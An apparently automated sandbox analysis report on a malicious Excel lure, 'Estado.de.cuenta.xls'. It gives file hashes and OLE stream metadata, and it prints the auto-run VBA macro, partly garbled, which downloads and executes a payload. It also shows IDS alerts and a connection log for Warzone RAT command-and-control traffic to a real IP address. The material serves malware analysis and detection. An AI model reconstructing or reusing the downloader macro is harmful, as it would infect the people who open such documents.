7dcce5b76c8b17472d024758970a406b | tqkdMdv2zO.doc | malicious | XenoRAT | 94.156.167.55
                                              No context
Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 283648
Entropy (8bit): 7.970287151801596
Encrypted: false
SSDEEP: 6144:A4qCIulquAQ40xAkvW2jxcbK9kMYzX/Qt8AsH7m2vOlPegMIOGd:DI6lAQ403vjjxcbKwr+8/sQgH
MD5: 07472F63BDEC0C4A83767D19B8B7BA19
SHA1: 32392707DDAC27EF3CB0BAA8365BA11D326E86CE
SHA-256: 044FF15E8D3C9534C11C3719BD88A8302611C697AE888B23C768CEC52F1970B6
SHA-512: 259DC8F8303B6BE1FDE58F090D2F628C80F9CAB83BE4DF93B0B272E3073658CF9504ACAB7795DF0727D900A025D9C2E5D1E7801A2F14C571F04E8B10A26F01AB
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 283648
Entropy (8bit): 7.970287151801596
Encrypted: false
SSDEEP: 6144:A4qCIulquAQ40xAkvW2jxcbK9kMYzX/Qt8AsH7m2vOlPegMIOGd:DI6lAQ403vjjxcbKwr+8/sQgH
MD5: 07472F63BDEC0C4A83767D19B8B7BA19
SHA1: 32392707DDAC27EF3CB0BAA8365BA11D326E86CE
SHA-256: 044FF15E8D3C9534C11C3719BD88A8302611C697AE888B23C768CEC52F1970B6
SHA-512: 259DC8F8303B6BE1FDE58F090D2F628C80F9CAB83BE4DF93B0B272E3073658CF9504ACAB7795DF0727D900A025D9C2E5D1E7801A2F14C571F04E8B10A26F01AB
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BB7DF04E1B0A2570657527A7E108AE23
SHA1: 5188431849B4613152FD7BDBA6A3FF0A4FD6424B
SHA-256: C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
SHA-512: 768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
Malicious: false
Reputation: high, very likely benign file
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BB7DF04E1B0A2570657527A7E108AE23
SHA1: 5188431849B4613152FD7BDBA6A3FF0A4FD6424B
SHA-256: C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
SHA-512: 768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
Malicious: false
Reputation: high, very likely benign file
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:modified
                                              Size (bytes):283648
                                              Entropy (8bit):7.970287151801596
                                              Encrypted:false
                                              SSDEEP:6144:A4qCIulquAQ40xAkvW2jxcbK9kMYzX/Qt8AsH7m2vOlPegMIOGd:DI6lAQ403vjjxcbKwr+8/sQgH
                                              MD5:07472F63BDEC0C4A83767D19B8B7BA19
                                              SHA1:32392707DDAC27EF3CB0BAA8365BA11D326E86CE
                                              SHA-256:044FF15E8D3C9534C11C3719BD88A8302611C697AE888B23C768CEC52F1970B6
                                              SHA-512:259DC8F8303B6BE1FDE58F090D2F628C80F9CAB83BE4DF93B0B272E3073658CF9504ACAB7795DF0727D900A025D9C2E5D1E7801A2F14C571F04E8B10A26F01AB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Last Saved By: oplup, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 6 20:43:11 2018, Last Saved Time/Date: Thu Dec 12 15:41:34 2024, Security: 0
                                              Entropy (8bit):6.275307414840059
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:Estado.de.cuenta.xls
                                              File size:69'120 bytes
                                              MD5:0e3fccb0710d5f645343f0e2085921f2
                                              SHA1:e9122949ab988638db6d8c0af8817b6ea9aa32a3
                                              SHA256:fcc55ce7ed8adcf68a39bcd131de11e4be7b55899f35614fc67b4ce6ae0d6c0f
                                              SHA512:70bfff4861e49b25fb7cc9eac296d70a84c6fee9f30091efeb4c5ae364d34fd9ce034b4e15d96013093c9fb3eadc1f850d73e9df63749e3ba6df57e8d853d6db
                                              SSDEEP:1536:bKxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAzXo4inBGp9tRG52yrTQhBlKjq0LOTbl:bKxEtjPOtioVjDGUU1qfDlaGGx+cL2QE
                                              TLSH:DA63F851378DC499C94843394FE6C6EAAE37FC149E96434B3144B72E2FB5EA0C93360A
                                              Icon Hash:276ea3a6a6b7bfbf
                                              Document Type:OLE
                                              Number of OLE Files:1
                                              Has Summary Info:
                                              Application Name:Microsoft Excel
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:False
                                              Flash Objects Count:0
                                              Contains VBA Macros:True
                                              Code Page:1252
                                              Author:admin
                                              Last Saved By:oplup
                                              Create Time:2018-12-06 20:43:11
                                              Last Saved Time:2024-12-12 15:41:34
                                              Creating Application:Microsoft Excel
                                              Security:0
                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:917504
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                              VBA File Name:Module1.bas
                                              Stream Size:960
                                              Attribute VB_Name = "Module1"
                                              Sub book()
                                              '
                                              End Sub
                                              

                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                              VBA File Name:Sheet1.cls
                                              Stream Size:985
                                              Attribute VB_Name = "Sheet1"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                              VBA File Name:Sheet2.cls
                                              Stream Size:985
                                              Attribute VB_Name = "Sheet2"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                              VBA File Name:Sheet3.cls
                                              Stream Size:985
                                              Attribute VB_Name = "Sheet3"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:7051
                                              Attribute VB_Name = "ThisWorkbook"
                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              Function ()
                                                       = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                                                       = " @#$%^&*()_+|01456789bdghjklmqvwz.,-~AFGHJKMNQRTVWXZ?!23acefinoprstuxyBCDEILOPSUY"
                                                      For u = 1 To Len()
                                                           = InStr(, Mid(, u, 1))
                                                          If  > 0 Then
                                                               = Mid(, , 1)
                                                               =  + 
                                                          Else
                                                               =  + Mid(, u, 1)
                                                          End If
                                                      Next
                                                       = 
                                                  End Function
                                              
                                              Function jumong() As Long
                                              
                                              jumong = fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux
                                              fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux As Byte
                                              fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux = 102
                                              Call Axgfhhdfthdsthdf
                                              Function Axgfhhdfthdsthdf()
                                              Axgfhhdfthdsthdf
                                              End Function
                                              
                                              Sub Workbook_Open()
                                              Dim WshShell As Object
                                              Dim GetUserDesktop As String
                                              Dim  As Integer
                                               = Chr(50) + Chr(48) + Chr(48)
                                                
                                              
                                                  Set WshShell = CreateObject("WScript.Shell")
                                                  GetUserDesktop = WshShell.SpecialFolders("Recent")
                                              Dim 
                                              Dim 
                                              Dim 
                                              Dim 
                                              Dim 
                                              Dim  As Integer
                                              Dim 
                                              Dim 
                                               = 1
                                              
                                              
                                              
                                              
                                              Set  = CreateObject("microsoft.xmlhttp")
                                              Set  = CreateObject("Shell.Application")
                                              
                                               = GetUserDesktop + ("\VZVQXT.")
                                              .Open "get", ("h://www.m.m/djgzlkkzkgNbgggh/dhdjdjwwwghdww/gdhjhjghggjhdhh/dgz/hzdhhz."), False
                                              .send
                                               = .responseBody
                                              If .Status = 200 Then
                                              Set  = CreateObject("adodb.stream")
                                              .Open
                                              .Type = 
                                              .Write 
                                              .SaveToFile ,  + 
                                              .Close
                                              End If
                                              .Open ()
                                              End Sub
                                              
                                              Function WfgxfcGreanx() As Byte
                                              WfgxfcGreanx = 100
                                              Call xdfzfgxdb
                                              Function xdfzfgxdb() As Boolean
                                              xdfzfgxdb = False
                                              Call Doorroom
                                              Function Doorroom() As Double
                                              Doorroom = Doorroom
                                              Call yormmmom
                                              Function yormmmom() As Variant
                                              yormmmom = jumong
                                              End Function
                                              
                                              
                                              

                                              General
                                              Stream Path:\x1CompObj
                                              CLSID:
                                              File Type:data
                                              Stream Size:107
                                              Entropy:4.184829500435969
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              CLSID:
                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.9042242012830974
                                              Base64 Encoded:False
                                              General
                                              Stream Path:\x5SummaryInformation
                                              CLSID:
                                              File Type:data
                                              Stream Size:208
                                              Entropy:3.536852300806355
                                              Base64 Encoded:False
                                              General
                                              Stream Path:Workbook
                                              CLSID:
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:41460
                                              Entropy:6.999667620012466
                                              Base64 Encoded:True
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              CLSID:
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:637
                                              Entropy:5.181386114087447
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . M o d u l e = M o d u l e 1 . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              CLSID:
                                              File Type:data
                                              Stream Size:128
                                              Entropy:3.225887155982128
                                              Base64 Encoded:False
                                              Data ASCII:M o d u l e 1 . M . o . d . u . l . e . 1 . . . T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              CLSID:
                                              File Type:data
                                              Stream Size:5293
                                              Entropy:5.588123947392458
                                              Base64 Encoded:False
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                              CLSID:
                                              File Type:data
                                              Stream Size:1632
                                              Entropy:4.425990994533497
                                              Base64 Encoded:False
                                              Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ i . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . P > ? l A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . . . .
                                              Data Raw:93 4b 2a 94 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                              CLSID:
                                              File Type:data
                                              Stream Size:228
                                              Entropy:4.261024303370967
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . b . . . V . . . . . . .
                                              Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 09 00 00 00 00 00 05 00 ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 19 03 00 00 00 00 00 00 69 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 19 00 00 08 62 00 00 00 b7 a5 b0 b0 a1 b3
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                              CLSID:
                                              File Type:data
                                              Stream Size:84
                                              Entropy:1.9112050925821995
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . ~ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . . . . . .
                                              Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 04 00 00 12 00 00 6b 00 00 7f 00 00 00 00
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                              CLSID:
                                              File Type:data
                                              Stream Size:104
                                              Entropy:1.8791610310005664
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . n . . . . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_4
                                              CLSID:
                                              File Type:data
                                              Stream Size:508
                                              Entropy:2.298399822472382
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . + . 8 . . . i . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 05 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 f1 05 00 00 00 00 00 00 19 06 00 00 00 00 00 00 41 06 00 00 00 00 00 00 ff ff ff ff c9 05 00 00 00 00 00 00 08 00 2b 00 38 00 00 00 69 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 91 06
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_5
                                              CLSID:
                                              File Type:data
                                              Stream Size:422
                                              Entropy:2.6991507280960803
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . 0 . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . / . / . ( . A . . . . . . . . . . ` . . . . . . . . . . . . . . ( . ( . . . . . . . . . . . ` . . . . . . . . . . . . . . / . $ . . . . . . . . . . . ` . . ! . . . . . . . . . . . . . ( . . . . . . . . . . . . ` . . % . . . . . . . . . . . % . ( . A . . . . . . . . . . ` . . ) . . . . . . . . . . . # . ( . . . . . . . . . . . ` . . - . . . . . . . . . . . +
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff 00 00 00 00 44 00 00 00 04 00 30 00 01 01 00 00 00 00 04 00 00 00 03 60 08 01 15 04 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 1e 00 2f 00 2f 00 28 00 41 01 00 00 00 00 04 00 01 00 03 60 04 01 19 04 ff ff ff ff
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              CLSID:
                                              File Type:MIPSEB ECOFF executable not stripped - version 72.3
                                              Stream Size:612
                                              Entropy:6.400776705551806
                                              Base64 Encoded:True
                                              Data ASCII:. ` . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . P n i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                              Data Raw:01 60 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 8b 50 6e 69 0d 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-12T21:54:10.245477+0100 | 2036735 | ET MALWARE Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) | 1 | 87.120.121.160 | 5220 | 192.168.2.22 | 49231 | TCP
2024-12-12T21:54:10.245477+0100 | 2852326 | ETPRO MALWARE Ave Maria/Warzone RAT InitializePacket | 1 | 87.120.121.160 | 5220 | 192.168.2.22 | 49231 | TCP
2024-12-12T21:54:10.287439+0100 | 2036734 | ET MALWARE Ave Maria/Warzone RAT Encrypted CnC Checkin | 1 | 192.168.2.22 | 49231 | 87.120.121.160 | 5220 | TCP
2024-12-12T21:54:10.287439+0100 | 2852327 | ETPRO MALWARE Ave Maria/Warzone RAT BeaconResponse | 1 | 192.168.2.22 | 49231 | 87.120.121.160 | 5220 | TCP
                                              Dec 12, 2024 21:48:00.223061085 CET491815220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:05.357634068 CET491825220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:05.477493048 CET52204918287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:05.477612019 CET491825220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:07.656550884 CET52204918287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:07.656724930 CET491825220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:12.790322065 CET491835220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:12.910582066 CET52204918387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:12.910801888 CET491835220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:15.044744015 CET52204918387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:15.044867039 CET491835220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:20.175793886 CET491845220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:20.300291061 CET52204918487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:20.300662041 CET491845220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:22.473232031 CET52204918487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:22.473342896 CET491845220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:27.609652042 CET491855220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:27.729626894 CET52204918587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:27.729717970 CET491855220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:29.894819975 CET52204918587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:29.895046949 CET491855220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:35.029407978 CET491865220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:35.149672031 CET52204918687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:35.149813890 CET491865220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:37.301105976 CET52204918687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:37.301255941 CET491865220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:42.443883896 CET491875220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:42.563898087 CET52204918787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:42.564518929 CET491875220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:44.723124027 CET52204918787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:44.723263979 CET491875220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:49.865906954 CET491885220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:49.991278887 CET52204918887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:49.991426945 CET491885220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:52.126379967 CET52204918887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:52.126463890 CET491885220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:57.257456064 CET491895220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:57.377265930 CET52204918987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:57.377451897 CET491895220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:48:59.519817114 CET52204918987.120.121.160192.168.2.22
                                              Dec 12, 2024 21:48:59.520078897 CET491895220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:04.666584969 CET491905220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:04.787405014 CET52204919087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:04.787606001 CET491905220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:06.941761017 CET52204919087.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:06.941854000 CET491905220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:12.076809883 CET491915220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:12.196619034 CET52204919187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:12.196913958 CET491915220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:14.333525896 CET52204919187.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:14.333751917 CET491915220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:19.476805925 CET491925220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:19.596740007 CET52204919287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:19.596894026 CET491925220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:21.863621950 CET52204919287.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:21.863774061 CET491925220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:27.245124102 CET491935220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:27.364785910 CET52204919387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:27.364902020 CET491935220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:29.501331091 CET52204919387.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:29.501429081 CET491935220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:34.641370058 CET491945220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:34.761307001 CET52204919487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:34.761579990 CET491945220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:36.907962084 CET52204919487.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:36.908062935 CET491945220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:42.043437958 CET491955220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:42.163441896 CET52204919587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:42.163583994 CET491955220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:44.282843113 CET52204919587.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:44.283035994 CET491955220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:49.430718899 CET491965220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:49.550645113 CET52204919687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:49.550843000 CET491965220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:51.751578093 CET52204919687.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:51.751713037 CET491965220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:56.897327900 CET491975220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:57.018184900 CET52204919787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:57.018407106 CET491975220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:49:59.258483887 CET52204919787.120.121.160192.168.2.22
                                              Dec 12, 2024 21:49:59.258796930 CET491975220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:04.403368950 CET491985220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:04.523308039 CET52204919887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:04.523448944 CET491985220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:06.661789894 CET52204919887.120.121.160192.168.2.22
                                              Dec 12, 2024 21:50:06.661875010 CET491985220192.168.2.2287.120.121.160
                                              Dec 12, 2024 21:50:11.784930944 CET491995220192.168.2.2287.120.121.160
